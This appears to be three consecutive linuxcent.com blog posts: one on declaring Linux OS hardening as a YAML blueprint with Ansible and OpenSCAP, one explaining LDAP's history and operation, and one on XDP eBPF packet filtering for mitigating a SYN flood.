Hardening Blueprint as Code — Declare Your OS Baseline in YAML

Reading Time: 6 minutes

OS Hardening as Code, Episode 2
Cloud AMI Security Risks · Linux Hardening as Code**

Focus Keyphrase: Linux hardening as code
Search Intent: Informational
Meta Description: Stop relying on hardening runbooks that get skipped at 2am. Declare your Linux OS baseline as a YAML blueprint — and build images where skipping a step is structurally impossible. (155 chars)


TL;DR

  • A hardening runbook is a list of steps someone runs. A HardeningBlueprint YAML is a build artifact — if it wasn’t applied, the image doesn’t exist
  • Linux hardening as code means declaring your entire OS security baseline in a single YAML file and building it reproducibly across any provider
  • stratum build --blueprint ubuntu22-cis-l1.yaml --provider aws either produces a hardened image or fails — there is no partial state
  • The blueprint includes: target OS/provider, compliance benchmark, Ansible roles, and per-control overrides with documented reasons
  • One blueprint file = one source of truth for your hardening posture, version-controlled and reviewable like any other infrastructure code
  • Post-build OpenSCAP scan runs automatically — the image only snapshots if it passes

The Problem: A Runbook That Gets Skipped Once Is a Runbook That Gets Skipped

Hardening runbook
       │
       ▼
  Human executes
  steps manually
       │
       ├─── 47 deployments: followed correctly
       │
       └─── 1 deployment at 2am: step 12 skipped
                    │
                    ▼
           Instance in production
           without audit logging,
           SSH password auth enabled,
           unnecessary services running

Linux hardening as code eliminates the human decision point. If the blueprint wasn’t applied, the image doesn’t exist.

EP01 showed that default cloud AMIs arrive pre-broken — unnecessary services, no audit logging, weak kernel parameters, SSH configured for convenience not security. The obvious response is a hardening script. But a script run by a human is still a process step. It can be skipped. It can be done halfway. It can drift across different engineers who each interpret “run the hardening script” slightly differently.


A production deployment last year. The platform team had a solid CIS L1 hardening runbook — 68 steps, well-documented, followed consistently. Then a critical incident at 2am required three new instances to be deployed on short notice. The engineer on call ran the provisioning script and, under pressure, skipped the hardening step with the intention of running it the next morning.

They didn’t. The three instances stayed in production unhardened for six weeks before an automated scan caught them. Audit logging wasn’t configured. SSH was accepting password authentication. Two unnecessary services were running that weren’t in the approved software list.

Nothing was breached. But the finding went into the next compliance report as a gap, the team spent a week remediating, and the post-mortem conclusion was “we need better runbook discipline.”

That’s the wrong conclusion. The runbook isn’t the problem. The problem is that hardening was a process step instead of a build constraint.


What Linux Hardening as Code Actually Means

Linux hardening as code is the same principle as infrastructure as code applied to OS security posture: the desired state is declared in a file, the file is the source of truth, and the execution is deterministic and repeatable.

HardeningBlueprint YAML
         │
         ▼
  stratum build
         │
  ┌──────┴──────────────────┐
  │  Provider Layer          │
  │  (cloud-init, disk       │
  │   names, metadata        │
  │   endpoint per provider) │
  └──────┬──────────────────┘
         │
  ┌──────┴──────────────────┐
  │  Ansible-Lockdown        │
  │  (CIS L1/L2, STIG —      │
  │   the hardening steps)   │
  └──────┬──────────────────┘
         │
  ┌──────┴──────────────────┐
  │  OpenSCAP Scanner        │
  │  (post-build verify)     │
  └──────┬──────────────────┘
         │
         ▼
  Golden Image (AMI/GCP image/Azure image)
  + Compliance grade in image metadata

The YAML file is what you write. Stratum handles the rest.


The HardeningBlueprint YAML

The blueprint is the complete, auditable declaration of your OS security posture:

# ubuntu22-cis-l1.yaml
name: ubuntu22-cis-l1
description: Ubuntu 22.04 CIS Level 1 baseline for production workloads
version: "1.0"

target:
  os: ubuntu
  version: "22.04"
  provider: aws
  region: ap-south-1
  instance_type: t3.medium

compliance:
  benchmark: cis-l1
  controls: all

hardening:
  - ansible-lockdown/UBUNTU22-CIS
  - role: custom-audit-logging
    vars:
      audit_log_retention_days: 90
      audit_max_log_file: 100

filesystem:
  tmp:
    type: tmpfs
    options: [nodev, nosuid, noexec]
  home:
    options: [nodev]

controls:
  - id: 1.1.2
    override: compliant
    reason: "tmpfs /tmp implemented via systemd unit — equivalent control"
  - id: 5.2.4
    override: compliant
    reason: "SSH timeout managed by session manager policy, not sshd_config"

Each section is explicit:

target — which OS, which version, which provider. This is the only provider-specific section. The compliance intent below it is portable.

compliance — which benchmark and which controls to apply. controls: all means every CIS L1 control. You can also specify controls: [1.x, 2.x] to scope to specific sections.

hardening — which Ansible roles to run. ansible-lockdown/UBUNTU22-CIS is the community CIS hardening role. You can add custom roles alongside it.

controls — documented exceptions. Not suppressions — overrides with a recorded reason. This is the difference between “we turned off this control” and “this control is satisfied by an equivalent implementation, documented here.”


Building the Image

# Validate the blueprint before building
stratum blueprint validate ubuntu22-cis-l1.yaml

# Build — this will take 15-20 minutes
stratum build --blueprint ubuntu22-cis-l1.yaml --provider aws

# Output:
# [15:42:01] Launching build instance...
# [15:42:45] Running ansible-lockdown/UBUNTU22-CIS (144 tasks)...
# [15:51:33] Running custom-audit-logging role...
# [15:52:11] Running post-build OpenSCAP scan (benchmark: cis-l1)...
# [15:54:08] Grade: A (98/100 controls passing)
# [15:54:09] 2 controls overridden (documented in blueprint)
# [15:54:10] Creating AMI snapshot: ami-0a7f3c9e82d1b4c05
# [15:54:47] Done. AMI tagged with compliance grade: cis-l1-A-98

If the post-build scan comes back below a configurable threshold, the build fails — no AMI is created. The instance is terminated. The image does not exist.

That is the structural guarantee. You cannot skip a build step at 2am because at 2am you’re calling stratum build, not running steps manually.


The Control Override Mechanism

The override mechanism is what separates this from checkbox compliance.

Every security benchmark has controls that conflict with how production environments actually work. CIS L1 recommends /tmp on a separate partition. Many cloud instances use tmpfs with equivalent nodev, nosuid, noexec mount options. The intent of the control is satisfied. The literal implementation differs.

Without an override mechanism, you have two bad options: fail the scan (noisy, meaningless), or configure the scanner to ignore the control (undocumented, invisible to auditors).

The blueprint’s controls section gives you a third option: record the override, document the reason, and let the scanner count it as compliant. The SARIF output and the compliance grade both reflect the documented state.

controls:
  - id: 1.1.2
    override: compliant
    reason: "tmpfs /tmp implemented via systemd unit — equivalent control"

This appears in the build log, in the SARIF export, and in the image metadata. An auditor reading the output sees: control 1.1.2 — compliant, documented exception, reason recorded. Not: control 1.1.2 — ignored.


What the Blueprint Gives You That a Script Doesn’t

Hardening script HardeningBlueprint YAML
Version-controlled Possible but not enforced Always — it’s a file
Auditable exceptions Typically not Built-in override mechanism
Post-build verification Manual or none Automatic OpenSCAP scan
Image exists only if hardened No Yes — build fails if scan fails
Multi-cloud portability Requires separate scripts Provider flag, same YAML
Drift detection Not possible Rescan instance against original grade
Skippable at 2am Yes No — you’d have to change the build process

The last row is the one that matters. A script is skippable because there’s a human in the loop. A blueprint is a build artifact — you can’t deploy the image without the blueprint having been applied, because the image is what the blueprint produces.


Validating a Blueprint Before Building

# Syntax and schema validation
stratum blueprint validate ubuntu22-cis-l1.yaml

# Dry-run — show what Ansible tasks will run, what controls will be checked
stratum build --blueprint ubuntu22-cis-l1.yaml --provider aws --dry-run

# Show all available controls for a benchmark
stratum blueprint controls --benchmark cis-l1 --os ubuntu --version 22.04

# Show what a specific control checks
stratum blueprint controls --id 1.1.2 --benchmark cis-l1

The dry-run output shows every Ansible task that will run, every OpenSCAP check that will fire, and flags any controls that might conflict with the provider environment before you’ve launched a build instance.


Production Gotchas

Build time is 15–25 minutes. Ansible-Lockdown applies 144+ tasks for CIS L1. Build this into your pipeline timing — don’t expect golden images in 3 minutes.

Cloud-init ordering matters. On AWS, certain hardening steps (sysctl tuning, PAM configuration) interact with cloud-init. The Stratum provider layer handles sequencing — but if you add custom hardening roles, test the cloud-init interaction explicitly.

Some CIS controls conflict with managed service requirements. AWS Systems Manager Session Manager requires specific SSH configuration. RDS requires specific networking settings. Use the controls override section to document these — don’t suppress them silently.

Kernel parameter hardening requires a reboot. Controls in the 3.x (network parameters) and 1.5.x (kernel modules) sections apply sysctl changes that take effect on reboot. The Stratum build process reboots the instance before the OpenSCAP scan — don’t skip the reboot if you’re building manually.


Key Takeaways

  • Linux hardening as code means the blueprint YAML is the build artifact — the image either exists and is hardened, or it doesn’t exist
  • The controls override mechanism is the difference between undocumented suppressions and auditable, reasoned exceptions
  • Post-build OpenSCAP scan runs automatically — a failing grade blocks image creation
  • One blueprint file is portable across providers (EP03 covers this): the compliance intent stays in the YAML, the cloud-specific details go in the provider layer
  • Version-controlling the blueprint gives you a complete history of what your OS security posture was at any point in time — the same way Terraform state tracks infrastructure

What’s Next

One blueprint, one provider. EP02 showed that the skip-at-2am problem is solved when hardening is a build artifact rather than a process step.

What it didn’t address: what happens when you expand to a second cloud. GCP uses different disk names. Azure cloud-init fires in a different order. The AWS metadata endpoint IP is different from every other provider. If you maintain separate hardening scripts per cloud, they drift within a month.

EP03 covers multi-cloud OS hardening: the same blueprint, six providers, no drift.

Next: multi-cloud OS hardening — one blueprint for AWS, GCP, and Azure

Get EP03 in your inbox when it publishes → linuxcent.com/subscribe

What Is LDAP — and Why It Was Invented to Replace Something Worse

Reading Time: 9 minutes

The Identity Stack, Episode 1
EP01EP02: LDAP Internals → EP03 → …

Focus Keyphrase: what is LDAP
Search Intent: Informational
Meta Description: LDAP solved 1980s authentication chaos and still powers enterprise logins today. Learn what it replaced, how it works, and why it’s still in your stack. (155 chars)


TL;DR

  • LDAP (Lightweight Directory Access Protocol) is a protocol for reading and writing directory information — most commonly, who is allowed to do what
  • It was built in 1993 as a “lightweight” alternative to X.500/DAP, which ran over the full OSI stack and was impossible to deploy on anything but mainframe hardware
  • Before LDAP, every server had its own /etc/passwd — 50 machines meant 50 separate user databases, managed manually
  • NIS (Network Information Service) was the first attempt to centralize this — it worked, then became a cleartext-credentials security liability
  • LDAP v3 (RFC 2251, 1997) is the version still in production today — 27 years of backwards compatibility
  • Everything you use today — Active Directory, Okta, Entra ID — is built on top of, or speaks, LDAP

The Big Picture: 50 Years of “Who Are You?”

1969–1980s   /etc/passwd — per-machine, no network auth
     │        50 servers = 50 user databases, managed manually
     │
     ▼
1984         Sun NIS / Yellow Pages — first centralized directory
     │        broadcast-based, no encryption, flat namespace
     │        Revolutionary for its era. A liability by the 1990s.
     │
     ▼
1988         X.500 / DAP — enterprise-grade directory services
     │        OSI protocol stack. Powerful. Impossible to deploy.
     │        Mainframe-class infrastructure required just to run it.
     │
     ▼
1993         RFC 1487 — LDAP v1
     │        Tim Howes, University of Michigan.
     │        Lightweight. TCP/IP. Actually deployable.
     │
     ▼
1997         RFC 2251 — LDAP v3
     │        SASL authentication. TLS. Controls. Referrals.
     │        The version still in production today.
     │
     ▼
2000s–now    Active Directory, OpenLDAP, 389-DS, FreeIPA
             Okta, Entra ID, Google Workspace
             LDAP DNA in every identity system on the planet.

What is LDAP? It’s the protocol that solved one of the most boring and consequential problems in computing: how do you know who someone is, across machines, at scale, without sending their password in cleartext?


The World Before LDAP

Before you understand why LDAP was invented, you need to feel the problem it solved.

Every Unix machine in the 1970s and 1980s managed its own users. When you created an account on a server, your username, UID, and hashed password went into /etc/passwd on that machine. Another machine had no idea you existed. If you needed access to ten servers, an administrator created ten separate accounts — manually, one by one. When you changed your password, each account had to be updated separately.

For a university with 200 machines and 10,000 students, this was chaos. For a company with offices in three cities, it was a full-time job for multiple sysadmins.

Machine A           Machine B           Machine C
/etc/passwd         /etc/passwd         /etc/passwd
vamshi:x:1001       (vamshi unknown)    vamshi:x:1004
alice:x:1002        alice:x:1001        alice:x:1003
bob:x:1003          bob:x:1002          (bob unknown)

Same people, different UIDs, different machines, no central truth.
File permissions become meaningless when UID 1001 means
different users on different hosts.

For every new hire, an admin SSHed to every machine and ran useradd. When someone left, you hoped whoever ran the offboarding remembered all the machines. Most organizations didn’t know their own attack surface because there was no single place to look.


Sun NIS: The First Attempt at Centralization

Sun Microsystems released NIS (Network Information Service) in 1984, originally called Yellow Pages — a name they had to drop after a trademark dispute with British Telecom. The idea was elegant: one server holds the authoritative /etc/passwd (and /etc/group, /etc/hosts, and a dozen other maps), and client machines query it instead of reading local files.

For the first time, you could create an account once and have it work across your entire network. For a generation of Unix administrators, NIS was liberating.

       NIS Master Server
       /var/yp/passwd.byname
              │
    ┌─────────┼──────────┐
    ▼         ▼          ▼
 Client A   Client B   Client C
 (query NIS — no local /etc/passwd needed)

NIS worked well — until it didn’t. The failure modes were structural:

No encryption. NIS responses were cleartext UDP. An attacker on the same network segment could capture the full password database with a packet sniffer. In 1984, “the network” meant a trusted corporate LAN. By the mid-1990s, it meant ethernet segments that included lab workstations, and the assumptions no longer held.

Broadcast-based discovery. NIS clients found servers by broadcasting on the local network. This worked on a single flat ethernet. It failed completely across routers, across buildings, and across WAN links. Multi-site organizations ended up running separate NIS domains with no connection between them — which partially defeated the purpose.

Flat namespace. NIS had no organizational hierarchy. One domain. Everything flat. You couldn’t have engineering and finance as separate administrative units. You couldn’t delegate user management to a department. One person — usually one overworked sysadmin — managed the whole thing.

UIDs had to match across all machines. If alice was UID 1002 on one server but UID 1001 on another, NFS file ownership became wrong. NIS enforced consistency, but onboarding a new machine into an existing network required manually auditing UID conflicts across the entire directory. Get one wrong and files end up owned by the wrong person.

NIS worked for thousands of installations from 1984 to the mid-1990s. It also ended careers when it failed. What the industry needed was a hierarchical, structured, encrypted, scalable directory service.


X.500 and DAP: The Right Idea, Wrong Protocol

The OSI (Open Systems Interconnection) standards body had an answer: X.500 directory services. X.500 was comprehensive, hierarchical, globally federated. The ITU-T published the standard in 1988, and it looked like exactly what enterprises needed.

X.500 Directory Information Tree (DIT)
              c=US                   ← country
                │
         o=University                ← organization
                │
         ┌──────┴──────┐
     ou=CS           ou=Physics      ← organizational units
         │
     cn=Tim Howes                    ← common name (person)
     telephoneNumber: +1-734-...
     mail: [email protected]

This data model — the hierarchy, the object classes, the distinguished names — is exactly what LDAP inherited. The DIT, the cn=, ou=, dc= notation in every LDAP query you’ve ever read: all of it came from X.500.

The problem was DAP: the Directory Access Protocol that X.500 used to communicate.

DAP ran over the full OSI protocol stack. Not TCP/IP — OSI. Seven layers, all of which required specialized software that in 1988 only mainframe and minicomputer vendors had implemented. A university department wanting to run X.500 needed hardware and software licenses that cost as much as a small car. The vast majority of workstations couldn’t speak OSI at all.

The data model was sound. The transport was impractical.

X.500 / DAP (1988)              LDAP v1 (1993)
──────────────────              ──────────────
Full OSI stack (7 layers)  →    TCP/IP only
Mainframe-class hardware   →    Any Unix box with a TCP stack
$50,000+ deployment cost   →    Free (reference implementation)
Vendor-specific OSI impl.  →    Standard socket API
Zero internet adoption     →    Universities deployed immediately

The Invention: LDAP at the University of Michigan

Tim Howes was at the University of Michigan in the early 1990s. The university was running X.500 for its directory — faculty, staff, student contact information, credentials. The data model was good. The protocol was the problem.

His insight, working with colleagues Wengyik Yeong and Steve Kille: strip X.500 down to what actually needs to function over a TCP/IP connection. Keep the hierarchical data model. Throw away the OSI transport. The result was the Lightweight Directory Access Protocol.

RFC 1487, published July 1993, described LDAP v1. It preserved the X.500 directory information model — the hierarchy, the object classes, the distinguished name format — and mapped it onto a protocol that could run over a simple TCP socket on port 389.

No specialized hardware. No OSI. If you had a Unix machine and TCP/IP, you could run LDAP. By 1993, that meant virtually every workstation and server in every university and most enterprises.

The University of Michigan deployed it immediately. Within two years, organizations across the internet were running the reference implementation.

LDAP v2 (RFC 1777, 1995) cleaned up the protocol. LDAP v3 (RFC 2251, 1997) is the version in production today — adding SASL authentication (which enables Kerberos integration), TLS support, referrals for federated directories, and extensible controls for server-side operations. The RFC that standardized the internet’s primary identity protocol is 27 years old and still running.


What LDAP Actually Is

LDAP is a client-server protocol for reading and writing a directory — a structured, hierarchical database optimized for reads.

Every entry in the directory has a Distinguished Name (DN) that describes its position in the hierarchy, and a set of attributes defined by its object classes. A person entry looks like this:

dn: cn=vamshi,ou=engineers,dc=linuxcent,dc=com

objectClass: inetOrgPerson
objectClass: posixAccount
cn: vamshi
uid: vamshi
uidNumber: 1001
gidNumber: 1001
homeDirectory: /home/vamshi
loginShell: /bin/bash
mail: [email protected]

The DN reads right-to-left: domain linuxcent.com (dc=linuxcent,dc=com) → organizational unit engineers → common name vamshi. Every entry in the directory has a unique path through the tree — there’s no ambiguity about which vamshi you mean.

LDAP defines eight operations: Bind (authenticate), Search, Add, Modify, Delete, ModifyDN (rename), Compare, and Abandon. Most of what a Linux authentication system does with LDAP reduces to two: Bind (prove you are who you say you are) and Search (tell me everything you know about this user).

When your Linux machine authenticates an SSH login against LDAP:

1. User types password
2. PAM calls pam_sss (or pam_ldap on older systems)
3. SSSD issues a Bind to the LDAP server: "I am cn=vamshi, and here is my credential"
4. LDAP server verifies the bind → success or failure
5. SSSD issues a Search: "give me the posixAccount attributes for uid=vamshi"
6. LDAP returns uidNumber, gidNumber, homeDirectory, loginShell
7. PAM creates the session with those attributes

The entire login flow is two LDAP operations: one Bind, one Search.


Try It Right Now

You don’t need to set up an LDAP server to run your first query. There’s a public test LDAP directory at ldap.forumsys.com:

# Query a public LDAP server — no setup required
ldapsearch -x \
  -H ldap://ldap.forumsys.com \
  -b "dc=example,dc=com" \
  -D "cn=read-only-admin,dc=example,dc=com" \
  -w readonly \
  "(objectClass=inetOrgPerson)" \
  cn mail uid

# What you get back (abbreviated):
# dn: uid=tesla,dc=example,dc=com
# cn: Tesla
# mail: [email protected]
# uid: tesla
#
# dn: uid=einstein,dc=example,dc=com
# cn: Albert Einstein
# mail: [email protected]
# uid: einstein

Decode what you just ran:

  • -x — simple authentication (username/password bind, not Kerberos/SASL)
  • -H ldap://ldap.forumsys.com — the LDAP server URI, port 389
  • -b "dc=example,dc=com" — the base DN, the top of the subtree to search
  • -D "cn=read-only-admin,dc=example,dc=com" — the bind DN (who you’re authenticating as)
  • -w readonly — the bind password
  • "(objectClass=inetOrgPerson)" — the search filter: return entries that are people
  • cn mail uid — the attributes to return (default returns all)

That’s a live LDAP query returning real directory entries from a server running RFC 2251 — the same protocol Tim Howes designed in 1993.

On your own Linux system, if you’re joined to AD or LDAP, you can query it the same way with your domain credentials.


Why It Never Went Away

LDAP v3 was finalized in 1997. In 2024, it’s still the protocol every enterprise directory speaks. Why?

Because it became the lingua franca of enterprise identity before any replacement existed. Every application that needs to authenticate users — VPN concentrators, mail servers, network switches, web applications, HR systems — implemented LDAP support. Every directory service Microsoft, Red Hat, Sun, and Novell shipped stored data in an LDAP-accessible tree.

When Microsoft built Active Directory in 1999, they built it on top of LDAP + Kerberos. When your Linux machine joins an AD domain, it speaks LDAP to enumerate users and groups, and Kerberos to verify credentials. When Okta or Entra ID syncs with your on-premises directory, it uses LDAP Sync (or a modern protocol that maps directly to LDAP semantics).

The protocol is old. The ecosystem built on top of it is so deep that replacing LDAP would mean simultaneously replacing every enterprise application that depends on it. Nobody has done that. Nobody has had to.

What happened instead is the stack got taller. LDAP at the bottom, Kerberos for network authentication, SSSD as the local caching daemon, PAM as the Linux integration layer, SAML and OIDC at the top for web-based federation. The directory is still LDAP. The interfaces above it evolved.

That full stack — from the directory at the bottom to Zero Trust at the top — is what this series covers.


⚠ Common Misconceptions

“LDAP is an authentication protocol.” LDAP is a directory protocol. It stores identity information and can verify credentials (via Bind). Authentication in modern stacks is typically Kerberos or OIDC — LDAP provides the directory backing it.

“LDAP is obsolete.” LDAP is the storage layer for Active Directory, OpenLDAP, 389-DS, FreeIPA, and every enterprise IdP’s on-premises sync. It is ubiquitous. What’s changed is the interface layer above it.

“You need Active Directory to run LDAP.” Active Directory uses LDAP. OpenLDAP, 389-DS, FreeIPA, and Apache Directory Server are all standalone LDAP implementations. You can run a directory without Microsoft.

“LDAP and LDAPS are different protocols.” LDAP is the protocol. LDAPS is LDAP over TLS on port 636. StartTLS is LDAP on port 389 with an in-session upgrade to TLS. Same protocol, different transport security.


Framework Alignment

Domain Relevance
CISSP Domain 5: Identity and Access Management LDAP is the foundational directory protocol for centralized identity stores — the base layer of every enterprise IAM stack
CISSP Domain 4: Communications and Network Security Port 389 (LDAP), 636 (LDAPS), 3268/3269 (AD Global Catalog) — transport security decisions affect every directory deployment
CISSP Domain 3: Security Architecture and Engineering DIT hierarchy, schema design, replication topology — directory structure is an architectural security decision
NIST SP 800-63B LDAP as a credential service provider (CSP) backing enterprise authenticators

Key Takeaways

  • LDAP was invented to solve a real, painful problem: the authentication chaos that NIS couldn’t fix and X.500/DAP was too expensive to deploy
  • It inherited the right thing from X.500 (the hierarchical data model) and replaced the right thing (the impractical OSI transport with TCP/IP)
  • NIS was the predecessor that worked until it didn’t — its failure modes (no encryption, flat namespace, broadcast discovery) are exactly what LDAP was designed to fix
  • LDAP v3 (RFC 2251, 1997) is still the production standard — 27 years later
  • Active Directory, OpenLDAP, FreeIPA, Okta, Entra ID — every enterprise identity system either runs LDAP or speaks it
  • The full authentication stack is deeper than LDAP: the next 12 episodes peel it apart layer by layer

What’s Next

EP01 stayed at the design level — the problem, the predecessor failures, the invention, the data model.

EP02 goes inside the wire. The DIT structure, DN syntax, object classes, schema, and the BER-encoded bytes that actually travel from the server to your authentication daemon. Run ldapsearch against your own directory and read every line of what comes back.

Next: LDAP Internals: The Directory Tree, Schema, and What Travels on the Wire

Get EP02 in your inbox when it publishes → linuxcent.com/subscribe

XDP — Packets Processed Before the Kernel Knows They Arrived

Reading Time: 10 minutes

eBPF: From Kernel to Cloud, Episode 7
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP**


TL;DR

  • XDP fires before sk_buff allocation — the earliest possible kernel hook for packet processing
    (sk_buff = the kernel’s socket buffer — every normal packet requires one to be allocated, which adds up fast at scale)
  • Three modes: native (in-driver, full performance), generic (fallback, no perf gain), offloaded (NIC ASIC)
  • XDP context is raw packet bytes — no socket, no cgroup, no pod identity; handle non-IP traffic explicitly
  • Every pointer dereference requires a bounds check against data_end — the verifier enforces this
  • BPF_MAP_TYPE_LPM_TRIE is the right map type for IP prefix blocklists — handles /32 hosts and CIDRs together
  • XDP metadata area enables coordination with TC programs — classify at XDP speed, enforce with pod context at TC

XDP eBPF fires before sk_buff allocation — the earliest possible kernel hook, and the reason iptables rules can be technically correct while still burning CPU at high packet rates. I had iptables DROP rules installed and working during a SYN flood. Packets were being dropped. CPU was still burning at 28% software interrupt time. The rules weren’t wrong. The hook was in the wrong place.


A client’s cluster was under a SYN flood — roughly 1 million packets per second from a rotating set of source IPs. We had iptables DROP rules installed within the first ten minutes, blocklist updated every 30 seconds as new source ranges appeared. The flood traffic dropped in volume. But node CPU stayed high. The %si column in top — software interrupt time — was sitting at 25–30%.

%si in top is the percentage of CPU time spent handling hardware interrupts and kernel-level packet processing — separate from your application’s CPU usage. On a quiet managed cluster (EKS, GKE) this is usually under 1%. Under a packet flood, high %si means the kernel is burning cycles just receiving packets, before your workloads run at all. It’s the metric that tells you the problem is below the application layer.

I didn’t understand why. The iptables rules were matching. Packets were being dropped. Why was the CPU still burning?

The answer is where in the kernel the drop was happening. iptables fires inside the netfilter framework — after the kernel has already allocated an sk_buff for the packet, done DMA from the NIC ring buffer, and traversed several netfilter hooks.

netfilter is the Linux kernel subsystem that handles packet filtering, NAT, and connection tracking. iptables is the userspace CLI that writes rules into it. At high packet rates, the cost isn’t the rule match — it’s the kernel work that happens before the rule is evaluated. At 1 million packets per second, the allocation cost alone is measurable. The attack was “slow” in network terms, but fast enough to keep the kernel memory allocator and netfilter traversal continuously busy.

XDP fires before any of that. Before sk_buff. Before routing. Before the kernel network stack has touched the packet at all. A DROP decision at the XDP layer costs one bounds check and a return value. Nothing else.

Quick Check: Is XDP Running on Your Cluster?

Before the data path walkthrough — a two-command check you can run right now on any cluster node:

# SSH into a worker node, then:
bpftool net list

On a Cilium-managed node, you’ll see something like:

eth0 (index 2):
        xdpdrv  id 44

lxc8a3f21b (index 7):
        tc ingress id 47
        tc egress  id 48

Reading the output:
xdpdrv — XDP in native mode, running in the NIC driver before sk_buff (this is what you want)
xdpgeneric instead of xdpdrvgeneric mode, runs after sk_buff allocation, no performance benefit
– No XDP line at all — XDP not deployed; your CNI uses iptables for service forwarding

If you’re on EKS with aws-vpc-cni or GKE with kubenet, you likely won’t see XDP here — those CNIs use iptables. Understanding this section explains why teams migrating to Cilium see lower node CPU under the same traffic load.

Where XDP Sits in the Kernel Data Path

The standard Linux packet receive path:

NIC hardware
  ↓
DMA to ring buffer (kernel memory)
  ↓
[XDP hook — fires here, before sk_buff]
  ├── XDP_DROP   → discard, zero further allocation
  ├── XDP_PASS   → continue to kernel network stack
  ├── XDP_TX     → transmit back out the same interface
  └── XDP_REDIRECT → forward to another interface or CPU
  ↓
sk_buff allocated from slab allocator
  ↓
netfilter: PREROUTING
  ↓
IP routing decision
  ↓
netfilter: INPUT or FORWARD
  ↓  [iptables fires somewhere in here]
socket receive queue
  ↓
userspace application

XDP runs at the driver level, in the NAPI poll context — the same context where the driver is processing received packets off the ring buffer. The program runs before the kernel’s general networking code gets involved. There’s no sk_buff, no reference counting, no slab allocation.

NAPI (New API) is how modern Linux receives packets efficiently. Instead of one CPU interrupt per packet (catastrophically expensive at 1Mpps), the NIC fires a single interrupt, then the kernel polls the NIC ring buffer in batches until it’s drained. XDP runs inside this polling loop — as close to the hardware as software gets without running on the NIC itself.

At 1Mpps, the difference between XDP_DROP and an iptables DROP is roughly the cost of allocating and then immediately freeing 1 million sk_buff objects per second — plus netfilter traversal, connection tracking lookup, and the DROP action itself. That’s the CPU time that was burning.

After moving the blocklist to an XDP program, the %si on the same traffic load dropped from 28% to 3%.

XDP Modes

XDP operates in three modes, and which one you get depends on your NIC driver.

Native XDP (XDP_FLAGS_DRV_MODE)

The eBPF program runs directly in the NIC driver’s NAPI poll function — in interrupt context, before sk_buff. This is the only mode that delivers the full performance benefit.

Driver support is required. The widely supported drivers: mlx4, mlx5 (Mellanox/NVIDIA), i40e, ice (Intel), bnxt_en (Broadcom), virtio_net (KVM/QEMU), veth (containers). Check support:

# Verify native XDP support on your driver
ethtool -i eth0 | grep driver
# driver: mlx5_core  ← supports native XDP

# Load in native mode
ip link set dev eth0 xdpdrv obj blocklist.bpf.o sec xdp

The veth driver supporting native XDP is what makes XDP meaningful inside Kubernetes pods — each pod’s veth interface can run an XDP program at wire speed.

Generic XDP (XDP_FLAGS_SKB_MODE)

Fallback for drivers that don’t support native XDP. The program still runs, but it runs after sk_buff allocation, as a hook in the netif_receive_skb path. No performance benefit over early netfilter. sk_buff is still allocated and freed for every packet.

# Generic mode — development and testing only
ip link set dev eth0 xdpgeneric obj blocklist.bpf.o sec xdp

Use this for development on a laptop with a NIC that lacks native XDP support. Never benchmark with it and never use it in production expecting performance gains.

Offloaded XDP

Runs on the NIC’s own processing unit (SmartNIC). Zero CPU involvement — the XDP decision happens in NIC hardware. Supported by Netronome Agilio NICs. Rare in production, but the theoretical ceiling for XDP performance.

The XDP Context: What Your Program Can See

XDP programs receive one argument: struct xdp_md.

struct xdp_md {
    __u32 data;           // offset of first packet byte in the ring buffer page
    __u32 data_end;       // offset past the last byte
    __u32 data_meta;      // metadata area before data (XDP metadata for TC cooperation)
    __u32 ingress_ifindex;
    __u32 rx_queue_index;
};

data and data_end are used as follows:

void *data     = (void *)(long)ctx->data;
void *data_end = (void *)(long)ctx->data_end;

// Every pointer dereference must be bounds-checked first
struct ethhdr *eth = data;
if ((void *)(eth + 1) > data_end)
    return XDP_PASS;  // malformed or truncated packet

The verifier enforces these bounds checks — every pointer derived from ctx->data must be validated before use. The error invalid mem access 'inv' means you dereferenced a pointer without checking the bounds. This is the most common cause of XDP program rejection.

For operators (not writing XDP code): You’ll see invalid mem access 'inv' in logs when an eBPF program is rejected at load time — most commonly during a Cilium upgrade or a custom tool deployment on a kernel the tool wasn’t built for. The fix is in the eBPF source or the tool version, not the cluster config. If you see this error and you’re not writing eBPF yourself, it means the tool’s build doesn’t match your kernel version — upgrade the tool or check its supported kernel matrix.

What XDP cannot see:
– Socket state — no socket buffer exists yet
– Cgroup hierarchy — no pod identity
– Process information — no PID, no container
– Connection tracking state (unless you maintain it yourself in a map)

XDP is ingress-only. It fires on packets arriving at an interface, not departing. For egress, TC is the hook.

What This Means on Your Cluster Right Now

Every Cilium-managed node has XDP programs running. Here’s how to see them:

# All XDP programs on all interfaces — this is the full picture
bpftool net list
# Sample output on a Cilium node:
#
# eth0 (index 2):
#         xdpdrv  id 44         ← XDP in native mode on the node uplink
#
# lxc8a3f21b (index 7):
#         tc ingress id 47      ← TC enforces NetworkPolicy on pod ingress
#         tc egress  id 48      ← TC enforces NetworkPolicy on pod egress
#
# "xdpdrv"     = native mode (runs in NIC driver, before sk_buff — full performance)
# "xdpgeneric" = fallback mode (after sk_buff — no performance benefit over iptables)

# Which mode is active?
ip link show eth0 | grep xdp
# xdp mode drv  ← native (full performance)
# xdp mode generic  ← fallback (no perf benefit)

# Details on the XDP program ID
bpftool prog show id $(bpftool net show dev eth0 | grep xdp | awk '{print $NF}')
# Shows: loaded_at, tag, xlated bytes, jited bytes, map IDs

The map IDs in that output are the BPF maps the XDP program is using — typically the service VIP table for DNAT, and in security tools, the blocklist or allowlist. To see what’s in them:

# List maps used by the XDP program
bpftool prog show id <PROG_ID> | grep map_ids

# Dump the service map (for a Cilium node — this is the load balancer table)
bpftool map dump id <MAP_ID> | head -40

For a blocklist scenario — like the SYN flood mitigation above — the BPF_MAP_TYPE_LPM_TRIE is the standard data structure. A lookup for 192.168.1.45 hits a 192.168.1.0/24 entry in the same map, handling both host /32s and CIDR ranges in one lookup. The practical operational check:

# Count entries in an XDP filter map
bpftool map dump id <BLOCKLIST_MAP_ID> | grep -c "key"

# Verify XDP is active and inspect program details
bpftool net show dev eth0

XDP Metadata: Cooperating with TC

Think of it as a sticky note attached to the packet. XDP writes the note at line speed (no context about pods or sockets). TC reads it later when full context is available, and acts on it. The packet carries the note between them.

More precisely: XDP can write metadata into the area before ctx->data — a small scratch space that survives as the packet moves from XDP to the TC hook. This is the coordination mechanism between the two eBPF layers.

The pattern is: XDP classifies at speed (no sk_buff overhead), TC enforces with pod context (where you have socket identity). XDP writes a classification tag into the metadata area. TC reads it and makes the policy decision.

